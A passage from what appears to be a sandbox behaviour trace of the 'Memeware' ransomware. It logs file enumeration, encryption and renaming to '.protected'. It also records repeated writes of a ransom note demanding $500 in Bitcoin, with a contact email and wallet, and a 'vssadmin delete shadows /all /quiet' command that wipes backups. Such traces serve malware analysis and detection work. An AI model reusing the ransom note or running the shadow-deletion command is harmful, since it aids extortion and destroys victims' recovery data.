nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x146, lpOverlapped=0x0) returned 1 [0096.094] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.094] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0096.094] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0096.094] CloseHandle (hObject=0xd4) returned 1 [0096.095] wnsprintfW (in: pszDest=0x4bfb20, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.protected") returned 62 [0096.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.protected" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.protected")) returned 1 [0096.095] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0096.095] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="Windows") returned -1 [0096.095] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="Program Files") returned 1 [0096.096] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="Program Files (x86)") returned 1 [0096.096] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="$Recycle.bin") returned 1 [0096.096] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="System Volume Information") returned 1 [0096.096] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0096.096] StrStrIW (lpFirst="Wildlife.wmv", lpSrch=".protected") returned 0x0 [0096.096] lstrcmpW (lpString1="Wildlife.wmv", lpString2="RESTORE_FILES.txt") returned 1 [0096.096] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.096] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xd4 [0096.096] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0096.096] StrStrW (lpFirst="Wildlife.wmv", lpSrch=".txt") returned 0x0 [0096.096] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0096.096] StrStrW (lpFirst="Wildlife.wmv", lpSrch=".rar") returned 0x0 [0096.096] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0096.096] StrStrW (lpFirst="Wildlife.wmv", lpSrch=".zip") returned 0x0 [0096.096] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0096.108] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.108] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0096.108] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.109] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0096.110] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0096.110] CloseHandle (hObject=0xd4) returned 1 [0096.126] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample 
Videos\\Wildlife.wmv.protected") returned 63 [0096.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.protected" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.protected")) returned 1 [0096.127] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0096.127] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0096.127] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\RESTORE_FILES.txt") returned 58 [0096.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\videos\\sample videos\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0096.127] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.127] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0096.128] lstrlenA (lpString="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") returned 684 [0096.128] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0096.128] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.128] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0096.128] CloseHandle (hObject=0xb4) returned 1 [0096.129] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0096.129] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0096.129] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\RESTORE_FILES.txt") returned 44 [0096.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\videos\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0096.129] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.129] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0096.130] lstrlenA (lpString="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") returned 684 [0096.130] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0096.130] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.130] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0096.130] CloseHandle (hObject=0xa4) returned 1 [0096.130] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0096.130] FindClose (in: hFindFile=0x47b950 | out: hFindFile=0x47b950) returned 1 [0096.130] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\RESTORE_FILES.txt") returned 37 [0096.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0096.131] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.131] WriteFile (in: hFile=0x104, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0096.131] lstrlenA (lpString="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") returned 684 [0096.131] WriteFile (in: hFile=0x104, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0096.132] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.132] WriteFile (in: hFile=0x104, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0096.132] CloseHandle (hObject=0x104) returned 1 [0096.132] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0096.132] FindClose (in: hFindFile=0x47b910 | out: hFindFile=0x47b910) returned 1 [0096.132] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\RESTORE_FILES.txt") returned 30 [0096.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RESTORE_FILES.txt" (normalized: "c:\\users\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xdc [0096.132] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.132] WriteFile (in: hFile=0xdc, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0096.133] lstrlenA (lpString="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") returned 684 [0096.133] WriteFile (in: hFile=0xdc, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0096.133] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.133] WriteFile (in: hFile=0xdc, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, 
lpOverlapped=0x0) returned 1 [0096.133] CloseHandle (hObject=0xdc) returned 1 [0096.133] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0096.133] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0096.133] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 0 [0096.133] FindClose (in: hFindFile=0x4472f8 | out: hFindFile=0x4472f8) returned 1 [0096.133] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\RESTORE_FILES.txt") returned 24 [0096.133] CreateFileW (lpFileName="\\\\?\\C:\\RESTORE_FILES.txt" (normalized: "c:\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0096.134] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.134] WriteFile (in: hFile=0x9c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f8c4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f8c4*=0x53d, lpOverlapped=0x0) returned 1 [0096.134] lstrlenA (lpString="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") returned 684 [0096.134] WriteFile (in: hFile=0x9c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f8c4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f8c4*=0x2ac, lpOverlapped=0x0) returned 1 [0096.134] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.134] WriteFile (in: hFile=0x9c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f8c4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f8c4*=0xb1, 
lpOverlapped=0x0) returned 1 [0096.135] CloseHandle (hObject=0x9c) returned 1 Thread: id = 9 os_tid = 0x9c0 Thread: id = 10 os_tid = 0x9c4 Thread: id = 41 os_tid = 0xb04 Process: id = "2" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x3e42f000" os_pid = "0x984" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x97c" cmd_line = " delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e814" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 239 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 240 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 241 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 242 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 243 start_va = 0x77860000 end_va = 0x77a08fff entry_point = 0x77860000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 244 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 245 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 
0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 246 start_va = 0x7fff0000 end_va = 0x7fff0fff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 247 start_va = 0xffd20000 end_va = 0xffd4cfff entry_point = 0xffd20000 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\System32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe") Region: id = 248 start_va = 0x7feffb80000 end_va = 0x7feffb80fff entry_point = 0x7feffb80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 249 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 250 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 251 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 253 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 254 start_va = 0x77740000 end_va = 0x7785efff entry_point = 0x77740000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 255 start_va = 0x7fefd900000 end_va = 0x7fefd96afff entry_point = 0x7fefd900000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 272 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 273 start_va = 0x20000 end_va 
= 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 274 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 275 start_va = 0x77640000 end_va = 0x77739fff entry_point = 0x77640000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 276 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 277 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 278 start_va = 0x7fef7e80000 end_va = 0x7fef7e96fff entry_point = 0x7fef7e80000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 279 start_va = 0x7fef7ea0000 end_va = 0x7fef804ffff entry_point = 0x7fef7ea0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 280 start_va = 0x7fefb260000 end_va = 0x7fefb278fff entry_point = 0x7fefb260000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 281 start_va = 0x7fefdb80000 end_va = 0x7fefdc48fff entry_point = 0x7fefdb80000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 282 start_va = 0x7fefdc50000 end_va = 0x7fefdd26fff entry_point = 0x7fefdc50000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: 
"c:\\windows\\system32\\oleaut32.dll") Region: id = 283 start_va = 0x7fefdd30000 end_va = 0x7fefdd3dfff entry_point = 0x7fefdd30000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 284 start_va = 0x7fefed10000 end_va = 0x7fefed76fff entry_point = 0x7fefed10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 285 start_va = 0x7feff0f0000 end_va = 0x7feff1cafff entry_point = 0x7feff0f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 286 start_va = 0x7feff1d0000 end_va = 0x7feff2fcfff entry_point = 0x7feff1d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 287 start_va = 0x7feff850000 end_va = 0x7feff86efff entry_point = 0x7feff850000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 288 start_va = 0x7feff870000 end_va = 